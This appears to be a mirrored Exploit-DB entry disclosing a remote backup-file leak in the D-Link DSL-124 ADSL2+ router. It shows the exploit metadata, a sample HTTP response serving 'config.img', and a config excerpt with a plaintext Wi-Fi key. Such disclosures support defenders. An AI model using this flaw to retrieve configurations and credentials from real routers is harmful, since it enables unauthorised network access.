关键漏洞信息 Exploit Details Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Date: 2022-11-10 Exploit Author: Aryan Chehreghani Vendor Homepage: https://www.dlink.com Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETF5eFlZdz09 Firmware Version: ME_1.00 Tested on: Windows 11 Vulnerable Device DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office, with integrated ADSL2+, supporting download speeds up to 24 Mbps, firewall protection, Quality of Service (QoS), 802.11n wireless LAN, and four Ethernet switch ports. HTTP Response HTTP/1.1 200 OK Connection: close Server: Virtual Web 0.9 Content-Type: application/octet-stream Content-Disposition: attachment;filename="config.img" Pragma: no-cache Cache-Control: no-cache Config Information File WLAN_WPA_PSK: pass@12345 WLAN_WPA_PSK_FORMAT: 0x0 WLAN_WPA_REKEY_TIME: WLAN_ENABLE_1X: 0x0 WLAN_ENABLE_MAC_AUTH: 0x0 WLAN_RS_IP: 0.0.0.0 Metadata Edb-ID: 51129 Cve: N/A Author: Aryan Chehreghani Type: Remote Platform: Hardware Date: 2023-03-29